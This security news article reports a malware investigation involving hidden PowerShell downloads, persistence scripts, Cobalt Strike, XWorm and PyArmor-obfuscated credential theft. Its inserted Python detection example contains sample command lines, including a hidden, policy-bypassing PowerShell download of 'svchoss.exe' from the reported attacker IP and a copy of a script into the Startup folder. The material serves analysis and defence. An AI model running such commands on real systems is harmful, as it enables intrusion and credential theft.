A sophisticated Python-based malware deployment uncovered during a fraud investigation has revealed a layered attack involving obfuscation, disposable infrastructure and commercial offensive tools.
The discovery was made by the Secuinfra Falcon Team after a user reported unusual desktop behaviour and unauthorised PayPal transfers.
The case began when the victim noticed "strange black windows" appearing briefly on screen and captured screenshots.
Those images showed fragments of a command script that had failed to fully suppress its output, exposing evidence of payload decoding and execution.
Initial Infection and PowerShell Activity
Secuinfra investigated the compromised system. Logs revealed repeated use of PowerShell commands configured to run in hidden mode with execution policy bypassed. One command retrieved a file named "svchoss.exe" from the IP address 43.156.63[.]124 and saved it to a temporary directory, mimicking the legitimate Windows process svchost.exe.
The IP address is associated with Autonomous System 132203, labelled "Tencent Building, Kejizhongyi Avenue", and the infrastructure sits within networks linked to Tencent. Researchers noted that such hosting locations are frequently abused for command-and-control (C2) operations.
Additional downloads included batch and Visual Basic (VB) scripts placed in startup folders to maintain persistence. Memory analysis later confirmed the presence of a concealed Python environment deployed under %LOCALAPPDATA%\Microsoft\SystemCache25.
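The behaviours described in this section (hidden PowerShell with the execution policy bypassed, a download from a raw IP into a temp directory, a look-alike of svchost.exe, and scripts dropped into the Startup folder) can be turned into simple process command-line triage. The following is an added detection example, not code from the investigation; the log lines are constructed to model the article's description, and the indicator names and similarity threshold are my own assumptions.

```python
import re
from difflib import SequenceMatcher

# Constructed sample process command lines (not real telemetry), modelled on
# the behaviours the investigation describes. The IP is the one the article
# reports, left defanged.
SAMPLE_LOGS = [
    'powershell.exe -w hidden -ep bypass -c "Invoke-WebRequest http://43.156.63[.]124/svchoss.exe -OutFile $env:TEMP\\svchoss.exe"',
    'cmd.exe /c copy C:\\Users\\u\\AppData\\Local\\Temp\\run.vbs "C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\run.vbs"',
    'C:\\Windows\\System32\\svchost.exe -k netsvcs',
    'powershell.exe -NoProfile -Command Get-Process',
]

# Legitimate Windows process names that malware commonly imitates.
LEGIT_NAMES = ["svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe"]

def lookalike(name):
    """Return the legitimate process name this one imitates, or None.
    The 0.85 similarity threshold is an assumption chosen for this example."""
    name = name.lower()
    for legit in LEGIT_NAMES:
        if name != legit and SequenceMatcher(None, name, legit).ratio() >= 0.85:
            return legit
    return None

def analyse(cmdline):
    """Return the set of suspicious indicators found in one command line."""
    hits = set()
    low = cmdline.lower()
    if re.search(r"-w(indowstyle)?\s+hidden", low):
        hits.add("hidden_window")
    if re.search(r"-e(xecutionpolicy|p)\s+bypass", low):
        hits.add("execpolicy_bypass")
    # Matches plain and defanged (1.2.3[.]4) dotted-quad URLs.
    if re.search(r"https?://\d{1,3}(\[?\.\]?\d{1,3}){3}", low):
        hits.add("download_from_raw_ip")
    if re.search(r"(\$env:temp|\\temp\\)", low):
        hits.add("temp_directory")
    if "\\start menu\\programs\\startup\\" in low:
        hits.add("startup_folder")
    for exe in re.findall(r"[\w-]+\.exe", low):
        if lookalike(exe):
            hits.add("lookalike:" + exe)
    return hits

def triage(logs):
    """Return {index: indicators} for every command line with at least one hit."""
    return {i: analyse(c) for i, c in enumerate(logs) if analyse(c)}
```

A benign svchost.exe launch and an ordinary PowerShell invocation produce no hits, so the output isolates only the lines worth an analyst's attention.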
Memory Forensics, Obfuscation and Credential Theft
Although disk imaging was not possible, investigators analysed memory dumps using Volatility 3 and string extraction tools. More than 5000 relevant indicators of compromise were identified before filtering. Among them were references to python.exe, xro.py and several encoded binary files.
Further pivoting on the identified IP address uncovered multiple malicious payloads hosted on the same server:
- XWorm RAT v5.6
- HTran tunnelling tool
- Cobalt Strike Beacon
- A PyInstaller-packed executable named svchoss.exe
The Cobalt Strike sample was confirmed as a beacon communicating with the same server from which it was downloaded. VirusTotal detections for svchoss.exe reached 41 out of 71 engines as of December 5th 2025.
Analysis of the PyInstaller sample revealed heavy obfuscation. Techniques included falsified Python version metadata, altered magic bytes, misleading filenames and the use of PyArmor. Extracted strings indicated attempts to access Chromium autofill data, cryptocurrency wallets and Mozilla Firefox profiles, suggesting credential theft functionality.
Investigators concluded the system had been fully compromised, though the initial infection vector could not be confirmed. Social engineering, malicious downloads or email-based delivery remain the most likely entry points.
